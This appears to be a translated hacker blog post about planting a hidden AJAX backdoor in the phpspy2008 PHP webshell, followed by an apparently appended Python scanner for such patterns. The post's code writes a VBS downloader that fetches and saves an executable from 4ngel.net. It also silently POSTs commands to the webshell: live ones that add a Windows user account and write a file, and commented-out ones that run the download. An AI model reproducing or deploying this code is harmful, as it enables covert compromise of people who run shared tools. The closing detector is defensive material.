Mango
I wanted to joke with people in the dark. Who knows the code after the CSRF instance passes through the blacklist. Now I understand. None of the tricks used by Tom can be reused. It will not work again. It was impressive because it was too dark.
Let's record it. AJAX is highly concealed. This is how I used it. It is relatively thorough.
Code:
elseif ($doing == 'writevbs') {
    $fp = @fopen('c:/angel.vbs', 'w');
    // VBS source: fetch the file over XMLHTTP, then write the response body to disk
    $vbs = "Set love = CreateObject(\"Microsoft.XMLHTTP\")".
    "love.Open \"GET\", \"http://www.4ngel.net/1.exe\", 0".
    "love.Send()".
    "Set you = CreateObject(\"ADODB.Stream\")".
    "you.Mode = 3".
    "you.Type = 1".
    "you.Open()".
    "you.Write(love.responseBody)".
    "you.SaveToFile \"c:\\1.exe\", 2";
    @fwrite($fp, $vbs);
    @fclose($fp);
}

A piece of code was added that generates a VBS script. This script downloads a 1.exe file from 4ngel.net to another 1.exe file. After that comes a piece of AJAX function code.
Code:
<script type="text/javascript">
var http_request = false;
// Sends a background request; nothing is shown to the user unless no XHR object can be created
function makeRequest(url, httpType, sendData) {
    http_request = false;
    if (!httpType) httpType = "GET";
    if (window.XMLHttpRequest) { // Non-IE...
        http_request = new XMLHttpRequest();
        if (http_request.overrideMimeType) {
            http_request.overrideMimeType('text/plain');
        }
    } else if (window.ActiveXObject) { // IE
        try {
            http_request = new ActiveXObject("Msxml2.XMLHTTP");
        } catch (e) {
            try {
                http_request = new ActiveXObject("Microsoft.XMLHTTP");
            } catch (e) {}
        }
    }
    if (!http_request) {
        alert('Cannot send an XMLHTTP request');
        return false;
    }
    http_request.open(httpType, url, true);
    http_request.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    http_request.send(sendData);
}
// makeRequest('<?=$self?>', 'POST', 'action=file&doing=writevbs');
// makeRequest('<?=$self?>', 'POST', 'action=shell&execfunc=system&command=c:angel.vbs');
// makeRequest('<?=$self?>', 'POST', 'action=shell&execfunc=system&command=c:1.exe');
makeRequest('<?=$self?>', 'POST', 'action=shell&execfunc=system&command=net user angel/add');
makeRequest('<?=$self?>', 'POST', 'action=shell&execfunc=system&command=echo my_name_is_angel> c:\\angel.txt');
</script>

The last few statements are POST requests to phpspy2008 in the local test environment. They call the command execution function, generate the VBS, and then run the VBS. Then they execute the downloaded exe file. But I have commented those out. This way, the local test was successful. You can't treat your brothers so harshly, so they are commented out. It just adds a user.
I just want to say: AJAX, as a technology that is gradually getting more attention, emphasizes improving the user experience while also bringing security concerns to users, because you do not know about the requests it makes. More specific applications depend on everyone's understanding.
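A defender-side check for the pattern described above, as an added example that is not part of the original post: before running a PHP tool obtained from someone else, scan it for inline scripts that silently POST command-execution parameters and for VBS download-to-disk strings. The rule patterns, the `audit` function and the sample input are assumptions constructed for illustration, and the command values in the sample are placeholders.

```python
import re

# Heuristics derived from the two snippets in this post (assumed, not exhaustive).
VBS_DROP = re.compile(r"ADODB\.Stream|SaveToFile", re.I)
CMD_POST = re.compile(r"['\"]POST['\"].*\b(?:execfunc|command)=", re.I)

# Constructed sample modelled on the post; command values are placeholders.
SAMPLE = r'''<?php
elseif ($doing == 'writevbs') {
    $vbs = "Set you = CreateObject(\"ADODB.Stream\")".
           "you.SaveToFile \"c:\\1.exe\", 2";
}
?>
<script type="text/javascript">
// makeRequest('<?=$self?>', 'POST', 'action=file&doing=writevbs');
// makeRequest('<?=$self?>', 'POST', 'action=shell&execfunc=system&command=PLACEHOLDER');
makeRequest('<?=$self?>', 'POST', 'action=shell&execfunc=system&command=PLACEHOLDER');
</script>
'''


def audit(source):
    """Return (line_no, rule, state) tuples for suspicious lines.

    state is 'dormant' for // commented lines and 'active' otherwise, so
    switched-off calls like the ones in the post are still reported.
    """
    findings, in_script = [], False
    for no, line in enumerate(source.splitlines(), 1):
        text = line.strip()
        if re.search(r"<script\b", text, re.I):
            in_script = True
        state = "dormant" if text.startswith("//") else "active"
        # VBS download-and-save strings can sit anywhere in the PHP source.
        if VBS_DROP.search(text):
            findings.append((no, "vbs-download-to-disk", state))
        # Command-execution POSTs only matter inside an inline script block.
        if in_script and CMD_POST.search(text):
            findings.append((no, "background-command-post", state))
        if re.search(r"</script>", text, re.I):
            in_script = False
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

Dormant findings deserve the same review as active ones, since removing two slashes re-enables the request.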